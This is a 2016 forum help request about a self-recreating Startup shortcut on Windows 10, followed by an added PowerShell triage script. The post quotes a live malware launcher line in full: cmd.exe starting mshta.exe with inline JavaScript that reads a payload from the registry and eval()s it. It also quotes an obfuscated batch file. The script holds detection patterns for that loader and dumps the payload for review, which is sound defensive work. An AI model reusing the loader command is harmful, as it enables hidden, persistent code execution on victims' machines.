Windows 10, odd cmd.exe shortcut in Startup folder, what's it executing?


No replies to this topic

#1 montejw360
Posted 16 December 2016 - 11:28 PM

There is a shortcut in the Startup folder with this as the command line it runs. I've deleted the shortcut and it just reappears within seconds. Rename it and a new one reappears within seconds.
 
C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\software\voxpbs\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"
 
I also found a batch file in my users\me\local folder. The commands it runs are
 
echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9 start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH
 
I see this being run when the computer boots. It's called by a shortcut named "d178". I see the command window for a short time during the boot process. I've scanned the file "505f.3f751"; it comes up with no infections so far.
 
If anyone has any ideas on what these are that would be cool. I haven't tried a boot into safe mode yet to see what happens then. I probably will soon.
 
thanks, Monte
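The shortcut above is a three-stage loader: the .lnk runs cmd.exe, which starts mshta.exe with an inline javascript: URL, which in turn reads the real payload from an HKCU registry value and eval()s it. The following PowerShell is an added triage script, not part of the original post, that resolves Startup-folder shortcuts, flags this mshta/RegRead/eval pattern, and saves the registry payload to a file for offline review instead of letting mshta run it. It assumes the standard per-user and all-users Startup folders, and that RegRead's last path component (semhdvkm) is the value name under HKCU\Software\voxpbs, which is how WScript.Shell.RegRead interprets a path without a trailing backslash.

```powershell
# Added triage example (not code from the original post). Assumptions: standard Startup
# folders; registry key/value split taken from the RegRead() argument quoted in the post.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),        # per-user Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
)
$shell = New-Object -ComObject WScript.Shell

# Resolve every .lnk in the Startup folders and flag those that chain into mshta with an
# inline script: URL that fetches code from the registry (the pattern seen in the post).
$suspicious = foreach ($dir in $startupDirs) {
    Get-ChildItem -Path $dir -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        $cmd = "$($lnk.TargetPath) $($lnk.Arguments)"
        if ($cmd -match 'mshta(\.exe)?\s+"?(javascript|vbscript):' -and $cmd -match 'RegRead|eval\(') {
            [pscustomobject]@{
                Shortcut = $_.FullName
                Created  = $_.CreationTime   # recreation "within seconds" shows up as a fresh timestamp
                Command  = $cmd
            }
        }
    }
}
$suspicious | Format-List

# The inline script is only a stub; the real payload lives in the registry value.
# Dump it to a text file for inspection rather than executing it.
$regPath  = 'HKCU:\Software\voxpbs'   # key portion of the post's RegRead() path
$regValue = 'semhdvkm'                # value name (last path component)
if (Test-Path $regPath) {
    $payload = (Get-ItemProperty -Path $regPath -Name $regValue -ErrorAction SilentlyContinue).$regValue
    if ($payload) {
        $out = Join-Path $env:TEMP 'semhdvkm_payload.txt'
        $payload | Out-File -FilePath $out -Encoding utf8
        "Registry payload: $($payload.Length) characters, saved to $out"
    }
}

# The shortcut reappearing within seconds means a running process is rewriting it.
# List processes whose command line references mshta or the dropped files from the post.
Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -match 'mshta|9d9b\\505f\.3f751|d178' } |
    Select-Object ProcessId, ParentProcessId, Name, CommandLine |
    Format-List
```

Run it from an elevated PowerShell prompt so both Startup folders and all process command lines are readable; the ParentProcessId column is what points at whatever keeps recreating the shortcut.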

